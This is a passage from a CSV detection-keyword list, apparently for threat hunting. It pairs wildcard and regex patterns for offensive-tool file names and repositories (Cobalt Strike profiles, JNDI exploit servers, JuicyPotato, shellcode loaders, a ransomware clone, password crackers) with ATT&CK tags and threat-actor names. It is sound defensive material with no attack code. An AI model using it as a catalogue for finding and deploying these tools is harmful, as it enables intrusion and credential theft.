We stand on the shoulders of giants","T1210 - T1212 - T1560 - T1562","TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/insecurityofthings/jackit","1","0","N/A","N/A","8","786","142","2020-10-01T04:37:00Z","2016-07-01T23:21:56Z" "*/jaff.profile*",".{0,1000}\/jaff\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/jas502n/CVE-2020-5902*",".{0,1000}\/jas502n\/CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","370","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*/jasmin-ransomware.git*",".{0,1000}\/jasmin\-ransomware\.git.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an 
advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*/jasperloader.profile*",".{0,1000}\/jasperloader\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/java/jndi/RMIRefServer.java*",".{0,1000}\/java\/jndi\/RMIRefServer\.java.{0,1000}","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. 
you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2471","712","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" "*/jdwp-exec.nse*",".{0,1000}\/jdwp\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/jdwp-info.nse*",".{0,1000}\/jdwp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/jdwp-inject.nse*",".{0,1000}\/jdwp\-inject\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/jdwp-version.nse*",".{0,1000}\/jdwp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/jiansiting/CVE-2020-5902*",".{0,1000}\/jiansiting\/CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jiansiting/CVE-2020-5902","1","0","N/A","N/A","1","6","5","2020-07-07T02:03:40Z","2020-07-07T02:03:39Z" "*/Jira-Lens.git*",".{0,1000}\/Jira\-Lens\.git.{0,1000}","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","269","38","2024-02-05T10:24:00Z","2021-11-14T18:37:47Z" "*/Jira-Lens/*",".{0,1000}\/Jira\-Lens\/.{0,1000}","offensive_tool_keyword","RedTeam_toolkit","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","269","38","2024-02-05T10:24:00Z","2021-11-14T18:37:47Z" "*/JoelGMSec/PyShell*",".{0,1000}\/JoelGMSec\/PyShell.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. 
Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","272","56","2023-10-23T14:24:14Z","2021-10-19T07:49:17Z" "*/john -*",".{0,1000}\/john\s\-.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/john.git*",".{0,1000}\/john\.git.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","10","10","1068","180","2024-02-13T12:41:07Z","2016-05-24T18:46:56Z" "*/john/run/*.pl*",".{0,1000}\/john\/run\/.{0,1000}\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/john/run/*.py*",".{0,1000}\/john\/run\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/john_the_ripper_cracker.py*",".{0,1000}\/john_the_ripper_cracker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource 
Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/JohnTheRipper*",".{0,1000}\/JohnTheRipper.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/Jomungand.git*",".{0,1000}\/Jomungand\.git.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*/Jormungand.sln*",".{0,1000}\/Jormungand\.sln.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*/Jormungandr.git*",".{0,1000}\/Jormungandr\.git.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","210","26","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*/js_inject.txt*",".{0,1000}\/js_inject\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/juicypotato*",".{0,1000}\/juicypotato.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/JuicyPotatoNG.git*",".{0,1000}\/JuicyPotatoNG\.git.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*/Jump-exec/Psexec*",".{0,1000}\/Jump\-exec\/Psexec.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - 
T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/JumpSession.cna*",".{0,1000}\/JumpSession\.cna.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","1","N/A","9","1","77","12","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z" "*/JumpSession_BOF.git*",".{0,1000}\/JumpSession_BOF\.git.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","1","N/A","9","1","77","12","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z" "*/K8_CS_*_*.rar*",".{0,1000}\/K8_CS_.{0,1000}_.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*/k8gege/*",".{0,1000}\/k8gege\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*/k8gege/scrun/*",".{0,1000}\/k8gege\/scrun\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","178","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" "*/k8gege520*",".{0,1000}\/k8gege520.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*/ka7ana/CVE*.ps1*",".{0,1000}\/ka7ana\/CVE.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","poc","Simple PoC in PowerShell for CVE-2023-23397","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","APT28 - STRONTIUM - 
Sednit - Sofacy - Fancy Bear","Exploitation tools","https://github.com/ka7ana/CVE-2023-23397","1","1","N/A","N/A","1","41","11","2023-03-16T19:29:49Z","2023-03-16T19:10:37Z" "*/kali/pool/main/*",".{0,1000}\/kali\/pool\/main\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/kali-linux-2023*",".{0,1000}\/kali\-linux\-2023.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/kali-tools-*",".{0,1000}\/kali\-tools\-.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/katoolin3*",".{0,1000}\/katoolin3.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","336","112","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*/KaynLdr.git*",".{0,1000}\/KaynLdr\.git.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","1","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*/KaynStrike.cna*",".{0,1000}\/KaynStrike\.cna.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*/KaynStrike.git*",".{0,1000}\/KaynStrike\.git.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" 
"*/KCMTicketFormatter*",".{0,1000}\/KCMTicketFormatter.{0,1000}","offensive_tool_keyword","KCMTicketFormatter","Format SSSD Raw Kerberos Payloads into CCACHE files for use on Windows systems","T1558.003 - T1550.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/blacklanternsecurity/KCMTicketFormatter","1","0","N/A","7","1","36","4","2021-05-26T20:23:56Z","2021-05-26T20:17:33Z" "*/kdstab.*",".{0,1000}\/kdstab\..{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*/KDStab.*",".{0,1000}\/KDStab\..{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*/KDStab/*",".{0,1000}\/KDStab\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*/keepass_discover.py*",".{0,1000}\/keepass_discover\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/keepass_discover_*.txt*",".{0,1000}\/keepass_discover_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" 